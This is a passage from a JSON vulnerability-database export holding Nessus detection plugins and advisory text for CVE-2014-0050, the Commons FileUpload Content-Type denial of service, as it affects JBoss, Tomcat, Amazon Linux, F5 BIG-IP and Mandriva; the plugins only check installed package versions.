Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0253\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossweb-\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossweb-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbossweb\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:46", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.", "edition": 24, "published": "2014-03-28T00:00:00", "title": "Amazon Linux AMI : tomcat7 (ALAS-2014-312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-312.NASL", "href": "https://www.tenable.com/plugins/nessus/73231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-312.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73231);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_xref(name:\"ALAS\", value:\"2014-312\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2014-312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat7' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.47-1.38.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:09:30", "description": "According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_52.NASL", "href": "https://www.tenable.com/plugins/nessus/72692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72692);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.52\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Apache Tomcat version 7.0.52 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 7.0.51 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"7.0.51\", min:\"7.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:57:59", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions. (CVE-2014-0050)", "edition": 28, "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache Commons FileUpload vulnerability (K15189)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL15189.NASL", "href": "https://www.tenable.com/plugins/nessus/78165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K15189.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78165);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"F5 Networks BIG-IP : Apache Commons FileUpload vulnerability (K15189)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions. (CVE-2014-0050)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15189\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K15189.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K15189\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.5.4\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.5.4\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.5.4\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF10\",\"11.2.1HF16\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF16\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF16\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:34", "description": "Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages is also being provided with this advisory.", "edition": 24, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-03-14T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tomcat-admin-webapps", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tomcat-docs-webapp", "p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api", "p-cpe:/a:mandriva:linux:tomcat-javadoc", "p-cpe:/a:mandriva:linux:tomcat-el-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload", "p-cpe:/a:mandriva:linux:tomcat-lib", "p-cpe:/a:mandriva:linux:tomcat", "p-cpe:/a:mandriva:linux:maven", "p-cpe:/a:mandriva:linux:tomcat-webapps", "p-cpe:/a:mandriva:linux:tomcat-jsvc", "p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc", "p-cpe:/a:mandriva:linux:maven-javadoc"], "id": "MANDRIVA_MDVSA-2014-056.NASL", "href": "https://www.tenable.com/plugins/nessus/73003", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:056. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73003);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"MDVSA\", value:\"2014:056\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages is also being provided with this advisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0109.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-javadoc-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-javadoc-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-admin-webapps-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-docs-webapp-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", 